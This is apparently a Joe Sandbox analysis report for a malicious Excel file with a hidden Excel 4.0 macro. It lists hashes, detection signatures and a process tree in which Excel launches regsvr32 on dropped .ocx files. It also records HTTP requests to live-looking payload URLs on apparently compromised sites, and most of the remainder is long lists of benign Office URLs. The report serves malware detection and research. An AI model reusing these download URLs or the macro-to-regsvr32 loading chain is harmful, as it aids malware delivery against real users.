Play interactive tour

Edit tour

Windows Analysis Report counter-1248368226.xls

Overview

General Information

Sample Name:	counter-1248368226.xls
Analysis ID:	532593
MD5:	30a0db47a66a3d3173457755bb166529
SHA1:	c852a219defe8ab726b72f8792386e35428b46dc
SHA256:	bdd97906934a97d1081e68ac8f71c98a169c4af705c17b73b69b3649df216885
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Yara detected hidden Macro 4.0 in Excel

Yara signature match

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected potential crypto function

Document contains embedded VBA macros

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

IP address seen in connection with other malware

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 2172 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

regsvr32.exe (PID: 6380 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6404 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6424 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
counter-1248368226.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x1deaa:$s1: Excel 0x1ef56:$s1: Excel 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
counter-1248368226.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\counter-1248368226.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x1deaa:$s1: Excel 0x1ef56:$s1: Excel 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\counter-1248368226.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2172, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, ProcessId: 6380

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: counter-1248368226.xls

ReversingLabs: Detection: 40%

Antivirus detection for URL or domain

Show sources

Source: https://playsis.com.br/qJSL1BN5V/tiynh.html

Avira URL Cloud: Label: malware

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 108.179.192.98:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.28.36.171:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.2.78:443 -> 192.168.2.5:49757 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.5:49740 -> 108.179.192.98:443

Source: global traffic

DNS query: name: greenflag.esp.br

Source: global traffic

TCP traffic: 192.168.2.5:49740 -> 108.179.192.98:443

Source: global traffic	HTTP traffic detected: GET /yuINdRbM/tiynh.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: greenflag.esp.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TSh7GBeIR/tiynh.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: noithat117.vnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qJSL1BN5V/tiynh.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: playsis.com.brConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 162.241.2.78 162.241.2.78
Source: Joe Sandbox View	IP Address: 108.179.192.98 108.179.192.98
Source: Joe Sandbox View	IP Address: 103.28.36.171 103.28.36.171

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757

Source: EXCEL.EXE, 00000000.00000003.251632175.0000000013064000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: EXCEL.EXE, 00000000.00000002.584870897.000000000DDF3000.00000004.00000001.sdmp	String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
Source: EXCEL.EXE, 00000000.00000002.586543409.000000000FBA0000.00000004.00000001.sdmp	String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
Source: EXCEL.EXE, 00000000.00000003.428823718.0000000016820000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.419599791.000000001682B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.428771441.00000000167F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.419659022.0000000016886000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.428911017.0000000016873000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000003.428911017.0000000016873000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000003.428823718.0000000016820000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.419599791.000000001682B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.428771441.00000000167F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.419659022.0000000016886000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledMBI_SSL_SHORT
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://analysis.windows.net/powerbi/apiI~?
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://analysis.windows.net/powerbi/apiN
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://analysis.windows.net/powerbi/apiT
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://analysis.windows.net/powerbi/apid
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechNM?
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechiKX
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 